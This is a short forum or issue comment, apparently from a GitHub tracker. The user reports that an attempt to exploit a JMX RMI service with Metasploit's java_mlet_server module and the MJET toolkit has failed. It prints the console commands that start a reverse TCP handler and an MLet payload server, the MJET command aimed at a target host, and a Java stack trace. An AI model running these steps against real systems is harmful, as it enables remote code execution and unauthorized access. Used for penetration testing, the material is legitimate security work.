sevck
commented
6 years ago msf is work. run jar is error.
msf exploit(java_mlet_server) > set LHOST 192.168.197.75 LHOST => 192.168.197.75 msf exploit(java_mlet_server) > set SRVHOST 192.168.197.75 SRVHOST => 192.168.197.75 msf exploit(java_mlet_server) > set URIPATH /mlet/ URIPATH => /mlet/ msf exploit(java_mlet_server) > run WARNING: Local file /usr/share/metasploit-framework/data/java is being used WARNING: Local files may be incompatible with the Metasploit Framework
[-] Exploit failed: No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/java/metasploit/Payload.class msf exploit(java_mlet_server) > run [*] Exploit running as background job.
[] Started reverse TCP handler on 192.168.197.75:4444 msf exploit(java_mlet_server) > [] Using URL: http://192.168.197.75:8080/mlet/ [*] Server started. msf exploit(java_mlet_server) >
i send payload : ./java -jar /root/mjet/mjet.jar -t 192.168.197.25 -p 1099 -u http://192.168.197.75:8080/mlet/
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.197.25:1099/jmxrmi ... java.io.IOException: Failed to retrieve RMIServer stub: javax.naming.NameNotFoundException: jmxrmi at javax.management.remote.rmi.RMIConnector.connect(RMIConnector.java:369) at javax.management.remote.JMXConnectorFactory.connect(JMXConnectorFactory.java:268) at javax.management.remote.JMXConnectorFactory.connect(JMXConnectorFactory.java:227) at de.mogwaisecurity.lab.mjet.Mjet.pwnJMXService(Mjet.java:76) at de.mogwaisecurity.lab.mjet.Mjet.main(Mjet.java:40) Caused by: javax.naming.NameNotFoundException: jmxrmi at com.sun.jndi.rmi.registry.RegistryContext.lookup(RegistryContext.java:116) at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:203) at javax.naming.InitialContext.lookup(InitialContext.java:411) at javax.management.remote.rmi.RMIConnector.findRMIServerJNDI(RMIConnector.java:1929) at javax.management.remote.rmi.RMIConnector.findRMIServer(RMIConnector.java:1896) at javax.management.remote.rmi.RMIConnector.connect(RMIConnector.java:286) ... 4 more
but ,is look at is not work.